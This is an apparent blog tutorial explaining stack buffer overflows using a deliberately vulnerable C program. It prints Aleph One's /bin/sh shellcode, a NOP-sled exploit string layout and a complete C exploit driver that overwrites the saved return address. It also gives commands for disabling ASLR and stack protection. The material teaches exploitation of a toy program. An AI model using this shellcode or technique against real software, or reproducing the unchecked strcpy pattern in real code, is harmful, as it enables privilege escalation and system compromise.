Pages

May 22, 2013

Stack-buffer Overflow Vulnerability

We read about many many malwares that are causing havoc in today's computers. How do they get into a computer in the first place? Memory vulnerabilities are one of the main ways in which a malware exploits the target computer.

The goal of any malware writer is to somehow get his malicious code to be executed on the victim computer. There are two ways to go about doing this. One way is to make the user himself execute the malicious executable, for example, using a phishing email that asks the user to open a malicious attachment. However, the malicious code often will have to be executed with elevated privileges, like an admin account, so that it can perform its evil deeds. In this case, the malware writer can choose to inject his code into a running process that already has admin privileges and causes the CPU to execute the injected code when the victim process is running. So the malicious code also has admin privileges. This requires that the victim process take some user input through which the malicious code can be injected into the victim process. For this to work properly, there are two phases – Code Injection and Instruction Pointer hijacking. Code Injection is when the malicious code is inserted into the victim process's memory by supplying the code – shell code – as user input that is unfiltered, and Instruction Pointer hijacking is the process of making the instruction pointer register (EIP) point to the injected malicious code. IP hijacking is also called Control Flow hijacking because the program's control flow is being redirected to the injected code.

Code Injection is pretty straight forward because many programs take input from the user without filtering them for malicious content. The programs take the input and place it somewhere in memory – stack or heap. From here on, the task of the malware writer is to ensure that the CPU executes this injected code somewhere in the near future by modifying the contents of the EIP register.

To understand how EIP can be modified, we first need to understand the memory layout of a process. There are 4 basic sections in a process's memory – text, data, heap and stack. In most systems the stack always grows down, i.e., two nested function calls means that function1's frame will be at a higher address than function2's frame – eg., 0xff88 vs. 0xff18. This doesn't mean that an array allocated on the stack also grows downwards! For example, an array whose base address is 0xff20 with a size of 20 bytes will have the last element at 0xff34 and NOT at 0xff06. A very good article about process memory layout is Anatomy of a program in memory. So basically when a function is called the return address is stored on the stackby the caller. When the callee returns the saved address is popped off the stack into the EIP so CPU continues executing inside the caller. If we can modify this saved return address value then we are indirectly controlling the EIP.

--[ Stack Buffer Overflow ]--
This is the most basic vulnerability to understand and exploit. What is surprising is that this basic attack was discovered in the 1990s and is still being used for exploits. A simple google search will yield multiple results about recent attacks. I will use the following program to explain the vulnerability.

// stack_vuln.exe
void foo(char *user_str)
{
    char local_str[64];
    strcpy(local_str, user_str);
}

int main(int argc, char *argv[])
{
    if(argc!=2) 
    { printf(“usage: %s <in_string>\n”, argv[0]); return 1; }
    foo(argv[1]);
    return 0;
}

User input is supplied via command line arguments and is passed to the function foo() by main(). foo() has a local char array of size 64, i.e., allocated on the stack. It simply copies the contents of the formal parameter *str to the local char array using strcpy(). Remember that strcpy() is very unsafe to use because it performs no boundary checking – very easy to overwrite the destination buffer. This vulnerability is what is being exploited now. Let's look at the stack when control is inside foo() just before executing the call instruction to strcpy().

When strcpy() is passed the address of local_str as destination buffer, it copies the contents of user_str to local_str until a '\0' is encountered. Now, if the source buffer contains a '\0' within the first 64 bytes, everything is fine. But if the length of the source buffer is 72 bytes, it overflows the destination buffer and overwrites the saved EBP and ret_addr. When foo() executes the return instruction, ret_addr is popped off the stack and into the EIP. So if the value of ret_addr can be modified, EIP can thus be controlled.

So how is this exploitable? A classic exploit is to have the remote machine open up a shell for the attacker. We can use Aleph One's shell code as our payload which is 46 bytes in size. The buffer overflow vuln is the attack vector with shell obtaining code as the payload. We now have the shell code but we must still come up with an exploit string that we give as input to the vulnerable program. The exploit string should be like this:

/*
 *         ** Exploit string layout **
 *
 * 0 1 2 3 ... 21  |  22 23 ... 67  |  68 69 70 71
 *      NOPs          shell_code     sip overwrite addr
 *
 */

  • We have a 64 byte vulnerable buffer on the stack and we have to write 72 bytes so that the saved EIP is overwritten.
  • We have 72-46-4 = 22 bytes extra space in the exploit string. We will use this to hold NOPs (0x90 instruction) to be used as a landing area. Index 0-21 will hold NOPs.
  • We store the shell code just behind the EIP overwrite address. Index 22-67 will hold the shell code.
  • The last 4 bytes will overwrite the saved EIP so the exploit strings's last 4 byte values must be the address of the start of our shell code. This is calculated by determing the address of the vulnerable buffer on the stack by running stack_vuln.exe in a debugger.
  • This exploit string will be supplied as the first argument to stack_vuln.exe program.

An example exploit string construction may be as follows. Assuming that the vulnerable local_str[] buffer starts at 0xbffffc28, we choose 0xbffffc2e as the target EIP address, we come up with the exploit string below. See, also, how it lines up in the stack area. The saved EIP ret_addr gets overwritten by 0xbffffc2e.

We execute stack_vuln.exe using the execve() system call as follows:

// shellcode from Aleph One's article
static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

char szExploit[64+4+4];  // 4 for sfp and 4 for sip
int iBufAddr = 0xbffffc2e;

int main()
{  
  char *args[3];
  char *env[1];
  int i, iSCStartIndex, *iptr;

  args[0] = "stack_vuln.exe"; 
  args[1] = szExploit;
  args[2] = NULL;
  env[0] = NULL;

  memset(szExploit, 0x90, sizeof(szExploit)); // set NOPs

  iSCStartIndex = 22;
  for(i = 0; i < sizeof(shellcode)-1; ++i)
    szExploit[iSCStartIndex++] = shellcode[i];

  // Place jump-to-exploit address at the end of our exploit string
  iptr = (int*)(szExploit+68);
  *iptr = iBufAddr;

  if (0 > execve(TARGET, args, env))
    fprintf(stderr, "execve failed.\n");

  return 0;
}

So stack_vuln.exe is exec'd with our exploit string as argv[1] and strcpy() copies this string to the stack buffer local_str and overwrites saved EIP. Finally when the ret instruction is executed in foo(), it takes the overwritten value, 0xbffffc2e, and copies it to the EIP register and CPU will now start executing from this address which has NOPs followed by the shellcode. We now get a new shell opened up for us. If we need a root shell then the target program executable must have setuid(sticky bit set) so that it runs with effective user ID as root(=0).

Caveats:

  • The exploit string must not contain a NULL byte (value 00) because strcpy() and any other string functions will not copy past the NULL byte.
  • The stack address changes a little bit when the target program is run under a debugger and when run by itself. I have seen a difference of 32bytes, i.e., local_str was at an address 32bytes lower on the stack when run in a debugger. So you must compensate for this in your exploit string.
  • Ofcourse, modern operating systems and compilers come with protection against this attack – ASLR, NX bits and stack protection. These must be disabled if you want to try this out(commands specific to Linux).
    • Disabling ASLR: sudo echo 0 > /proc/sys/kernel/randomize_va_space
    • Removing stack protection: Compile with -fno-stack-protector -z execstack

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.